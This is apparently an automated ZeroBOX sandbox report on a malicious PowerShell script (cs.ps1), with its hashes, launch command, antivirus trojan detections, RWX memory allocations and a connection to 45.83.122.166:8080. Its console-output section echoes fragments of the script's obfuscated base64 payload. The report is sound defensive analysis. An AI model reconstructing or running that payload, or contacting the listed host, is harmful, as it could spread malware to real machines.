Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 20, 2023, 9:43 a.m.	March 20, 2023, 10:16 a.m.

Size	6.2KB
Type	ASCII text, with very long lines
MD5	`2d14fc0abc9432b32d79353b89b9c294`
SHA256	`da69111d0ba32fa46dfcf6dbb30d672d39bf5794951f5c4d69fb378eda4bd1ff`
CRC32	`CC56E991`
ssdeep	`192:+9iMvwGTCLLmuq3WoR8XycmA4gMrxYjxs+wA9zzL:+YMvNCLeWuUycmA4gMrxYVs+wA9zzL`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\cs.ps1
2040

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
45.83.122.166	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 170 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x0000001f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\cs.ps1:1 char:5815 console_handle: 0x0000002b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: + [Byte[]]$c = [System.Convert]::FromBase64String('AXQBa0BmOxsXTzxAAAFyF1xqY1wB console_handle: 0x00000037	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: dAFZZkEkXG1gXFpcSRdzF1lmYSRrYFhuF3MXa0BmOxsXa2VcZGxeaTgkFykqajhlbEkkF3QXWBsXTzx console_handle: 0x00000043	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: AFyBYGx9kWGlYZxdyF1lmYSRraVhragABchcgLxdoXCQXXHFgajExVGlrR2tlQFIfF11AAQE3HgEgZm console_handle: 0x0000004f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: lcUTExVGlrR2tlQFIfXGJmbWVAJVxkZWxpVmlYbRsBICAgVFtgZk1SHxcgVGlrR2tlQFIfNxdcZ3BrV console_handle: 0x0000005b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: lxrWF5cY1xbVmtcXlZaZWxdHxcjaVxdXWxZVmlYbRsfaVxrZWBmR2VmYGtaZWw9aWY9XGtYXlxjXDtr console_handle: 0x00000067	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: XD4xMVRjWF9qaVhEJWpcWmBtaVxKZ2ZpXGtlQCVcZGBrZWxJJWRca2pwSlIXNBdcZGVsaVZpWG0bAQE console_handle: 0x00000073	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: gX2teZVxjJVxbZlpWaVhtGxcjaVxdXWxZVmlYbRsXIycXI1xbZlpWaVhtGx9wZ2Y6MTFUY1hfamlYRC console_handle: 0x0000007f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: VqXFpgbWlcSmdmaVxrZUAlXGRga2VsSSVkXGtqcEpSASAnK28nFyMnJycqbycXI19rXmVcQyVcW2ZaV console_handle: 0x0000008b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: mlYbRsXI2ZpXFExMVRpa0drZUBSH1xiZm1lQCVYbVZpWG0bFzQXaVxdXWxZVmlYbRsBICAgVGlrR2tl console_handle: 0x00000097	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: QFIfFyBUKSprZUBMUhcjVCkqa2VATFIXI1QpKmtlQExSFyNUaWtHa2VAUh83F1xncGtWXGtYXlxjXFt console_handle: 0x000000a3	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: Wa1xeVlplbF0fFyMgWmZjYzhjWGxraWBNF2NjWyUpKmNcZWlcYhdqalxpW1tYVlpmaWdWa1xeVlplbF console_handle: 0x000000af	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 0fH2lca2VgZkdlZmBrWmVsPWlmPVxrWF5cY1w7a1w+MTFUY1hfamlYRCVqXFpgbWlcSmdmaVxrZUAlX console_handle: 0x000000bb	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: GRga2VsSSVkXGtqcEpSFzQXWG1WaVhtGwEBdAEsKhdpZm9ZJBdUbxtSXFtmWlZpWG0bFzQXVG8bUlxb console_handle: 0x000000c7	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: ZlpWaVhtGwABchcgIiJvGxcya2VsZjolXFtmWlZpWG0bF2tjJBdvGxcyJxc0F28bHxdpZl0BASAeNDR console_handle: 0x000000d3	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: eYkMoXT5hTEk9SidIPElASTtIakk7Tlo5Kloua2hDOyJcPlkoK2Q6bEBiXlgsT0VsZylxW25oTllEQ0 console_handle: 0x000000df	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 0/WmFEcDhhajxbPGlCWnBnbUBhRHBAYWZBailxa29uWytcQ0kqQGFFcEBDRXBAcURwSmFjYjBaT09eT console_handle: 0x000000eb	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: kYwSmE8PC1EQ09gRlk7PSxBSV5ROk9tWidiPy9wTXFROSxGW01nZUtIKWdhMFpdb1BIcTxsW2FPaUVQ console_handle: 0x000000f7	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: MEY+JkVpYyZIbUtoJ2FGakRFYGsrbFxpZS8nSkNBYCdraEROa2ZBKGtHZSgnUSdcSlFqTzsiS0RcQ2w console_handle: 0x00000103	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: uRWQvLF1iZGxFPzBEL0VZSm5JOUBPTSddK0tOcE1hamFtRWJxUHBdWmovL19ZJ0xdR01sUF1NWkUuQy console_handle: 0x0000010f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: dhTSg5XENFakJRMD1gbT9uZ2k4a1tDW108SFApTTo+ZD8wPl9salxFYyZZZF8nLkRoME1KTUctUExCa console_handle: 0x0000011b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 2Y6IitfP0I6ZVFRRCgqL01FRkJeOGsmSUQ/Kl5bby5gXmlsLy1jTidsZ25qb0hQaCpAZytgOnE5ZVBs console_handle: 0x00000127	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: RTg+SydIPURaTUs+W2JKSVsqOFBaST0nbz5bO15fPEVMbzgqKCk4SEk9Sz8oYkonRTg+SyduPEpEXlF console_handle: 0x00000133	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: oOWVZO15fSUc9YkpPQSdMRm88SENEbjxFUDk7OjAnS0JjPUtsRUg+TyhiSTxBZDtJUTxMKUU6PmpKTT console_handle: 0x0000013f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: xaZmhmbi1mRl9wSkVbaWhNakMtRisrOChHUUZwbCxjYEQmImFATTtcSyc7TUhoUCpmaFg6JytCUTpdP console_handle: 0x0000014b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: kZwWXAuW2pDaC5nJlhRIk1qWGxNYVFNREE+Si1IWWdMKmFqPVstWzk7WnFFKkRrL0BhQGAtQkdwQGBA console_handle: 0x00000157	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: aXBaQzkqWnFFTkJHKlxiUD0sWERwQEREOmUpcUVCO0s/Y0NFT1twSUpKJ29rPClxazwwQV5RQ0FsaCl console_handle: 0x00000163	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: xa105WVxgQ2c6cFhpLUFPTWtnWkNvQGFASi1lcHArZFhHKlBrS0FGakxbbm9bSidJPypKbmUwWk9YbW console_handle: 0x0000016f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: NRKEoob0tKcVtKSjtpLUBhOG9mQ0U/K15ObGgpcUU+RVA/cENFT1puPU9ab1stK0lEcEpvPW08K0VwQ console_handle: 0x0000017b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: GEvaHBxUUcqY3FpaCdrJ1puRXBAL0QuSnBBP0BBQWVaaEM5XGFEcEA/aGowWktmTihjb0onST9bJ0k/ console_handle: 0x00000187	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: KkpEcEBhRHBwKXFFQT1IKFlDW2VKRWc8TUNFcE0+KCdKIk1CcG9eWFwvaypuWkNPXC1BPFwrW245ZWc console_handle: 0x00000193	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: tL2BeLUFmOm1AJmo/aGYwOmg9OW1AP2o/aC49ak0/Kz0+WS49QE9ZKG5ZSGxAbG5sK0dGbDxaQ0kwYF console_handle: 0x0000019f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 4tPWZoKT84O21AO2o/aC5qPmhxRW1AZ1soK2RsKFBmRm1AXTw+aHE8P2gnPSonOUtsQGxubCs7L0hAX console_handle: 0x000001ab	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: UEnP0dGbDxaQ0k5Z0lBQ0M8PWgqPD9obTw/aEs8P2g/PW08PmktSGFEcEBobC8qHh9eZWBpa0orLVxq console_handle: 0x000001b7	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: WDlkZmk9MTFUa2lcbWVmOiVkXGtqcEpSFzQXXFtmWlZpWG0bVFRSXGtwOVIBAXQBIB9cZ3BLXGtYXGk console_handle: 0x000001c3	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 6JWlcW2NgbFlWXGdwa1ZpWG0bF2VpbGtcaQABASAeW1xeWGVYRBcjXGRga2VsSR4fal5YYz1lZmBrWG console_handle: 0x000001cf	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: tlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNcZ3BrVmVpbGtcaVZpWG0bFyMeY1hsa2lgTRcja console_handle: 0x000001db	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 2ZjSm5cRRcjXmBKcDlcW2A/FyNaYGNZbEceFyMeXGJmbWVAHh9bZl9rXERcZWBdXDslaVxbY2BsWVZc console_handle: 0x000001e7	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: Z3BrVmlYbRsAASAeW1xeWGVYRBcjXGRga2VsSR4fal5YYz1lZmBrWGtlXGRcY2dkQGtcSiUgamlca1x console_handle: 0x000001f3	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: kWGlYZ1ZpWG0bFyNbaVhbZVhrSjExVGplZmBrZVxtZWY6XmVgY2NYOiVlZmBrWlxjXVxJJWRca2pwSl console_handle: 0x000001ff	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: IXIx5aYGNZbEcXI15gSnA5XFtgPxcjXGRYRWNYYFpcZ0pLSR4faWZrWmxpa2plZjpcZWBdXDslaVxbY console_handle: 0x0000020b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: 2BsWVZcZ3BrVmlYbRsAASBUXGtYXlxjXDtralhaYGtjbEQlZFxranBKUhcjHmpqWGM6ZmtsOBcjampY console_handle: 0x00000217	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: YzpgamU4FyNbXGNYXEoXI1pgY1lsRxcjampYYzoeFyMeXGdwS1xrWF5cY1w7cEQeH1xncEtcZWBdXDs console_handle: 0x00000223	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: lIFxqY1hdGxcjHlxjbFtmRHBpZmRcRGVAHh9cY2xbZkRaYGRYZXA7XGVgXVw7JSBlbEkxMVRqalxaWj console_handle: 0x0000022f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: hpXFtjYGw5cGNZZFxqajgla2BkPCVlZmBrWlxjXVxJJWRca2pwSlIXIyAgHlxrWF5cY1w7W1xrWlxjX console_handle: 0x0000023b	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: VxJHh9cZFhFcGNZZFxqajglZWZga1pcY11cSSVkXGtqcEoXa1pcYVlGJG5cRR8fcGNZZFxqajhaYGRY console_handle: 0x00000247	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: ZXA7XGVgXVw7JWVgWGRmO2tlXGlpbDoxMVRlYFhkZjtnZzhSFzQXaVxbY2BsWVZcZ3BrVmlYbRsAAQE console_handle: 0x00000253	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: gAAFUW2BmTVIXNBdcZ3BrVmVpbGtcaVZpWG0bF1RcZ3BLUhdUICgXNBdlZmBrYGpmRx9pXGtcZFhpWE console_handle: 0x0000025f	1	1
WriteConsoleW March 20, 2023, 9:43 a.m.	buffer: dSAAABI2ppXGtcZFhpWGdWaVhtGxdUVFJcZ3BLUhdUIFxsaUsbFzQXcGlma1hbZVhEFyMnFzQXZWZga console_handle: 0x0000026b	1	1

Uses Windows APIs to generate a cryptographic key (4 events)

Time & API	Arguments	Status	Return
CryptExportKey March 20, 2023, 9:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003823b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003823b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003823b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:43 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003823b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 20, 2023, 9:43 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (28 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06181000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06182000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05341000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06183000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05356000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05670000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:43 a.m.	process_identifier: 2040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Avast	Script:SNH-gen [Trj]
McAfee-GW-Edition	BehavesLike.PS.Dropper.xn
Google	Detected
Ikarus	Trojan.PowerShell.Agent
AVG	Script:SNH-gen [Trj]

Communicates with host for which no DNS query was performed (1 event)

host

45.83.122.166

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

45.83.122.166:8080

cs.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All